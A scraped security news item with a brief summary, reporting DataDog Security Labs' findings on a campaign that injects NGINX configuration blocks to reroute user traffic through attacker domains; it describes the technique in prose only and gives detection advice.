Article Details
Scrape Timestamp (UTC): 2026-02-04 23:27:46.527
Original Article Text
Click to Toggle View
Hackers compromise NGINX servers to redirect user traffic. A threat actor is compromising NGINX servers in a campaign that hijacks user traffic and reroutes it through the attacker's backend infrastructure. NGINX is open-source software for web traffic management. It intermediates connections between users and servers and is employed for web serving, load balancing, caching, and reverse proxying. The malicious campaign, discovered by researchers at DataDog Security Labs, targets NGINX installations and Baota hosting management panels used by sites with Asian top-level domains (.in, .id, .pe, .bd, and .th) and government and educational sites (.edu and .gov). Attackers modify existing NGINX configuration files by injecting malicious ‘location’ blocks that capture incoming requests on attacker-selected URL paths. They then rewrite them to include the full original URL, and forward traffic via the ‘proxy_pass’ directive to attacker-controlled domains. The abused directive is normally used for load balancing, allowing NGINX to reroute requests through alternative backend server groups to improve performance or reliability; hence, its abuse does not trigger any security alerts. Request headers such as ‘Host,’ ‘X-Real-IP,’ ‘User-Agent,’ and ‘Referer’ are preserved to make the traffic appear legitimate. The attack uses a scripted multi-stage toolkit to perform the NGINX configuration injections. The toolkit operates in five stages: These attacks are hard to detect because they do not exploit an NGINX vulnerability; instead, they hide malicious instructions in its configuration files, which are rarely scrutinized. Also, user traffic still reaches the intended destination, often directly, so the passing through attacker infrastructure is unlikely to be noticed unless specific monitoring is performed. The future of IT infrastructure is here Modern IT infrastructure moves faster than manual workflows can handle. In this new Tines guide, learn how your team can reduce hidden manual delays, improve reliability through automated response, and build and scale intelligent workflows on top of tools you already use.
Daily Brief Summary
DataDog Security Labs discovered a cyber campaign targeting NGINX servers, redirecting user traffic through attacker-controlled infrastructure, primarily affecting Asian domains and government and educational sites.
Attackers manipulate NGINX configuration files by injecting malicious 'location' blocks, rerouting traffic via the 'proxy_pass' directive to domains under their control.
The campaign exploits the legitimate use of the 'proxy_pass' directive for load balancing, making detection challenging as it does not trigger typical security alerts.
A scripted multi-stage toolkit is employed to inject the malicious configurations, making these attacks difficult to detect without specific monitoring.
Traffic appears legitimate as request headers are preserved, allowing user traffic to reach intended destinations, complicating detection further.
Organizations using NGINX, especially those in targeted regions, should enhance monitoring of configuration files and implement robust security measures to detect such manipulations.
This incident underscores the need for continuous monitoring and auditing of server configurations to prevent unauthorized modifications.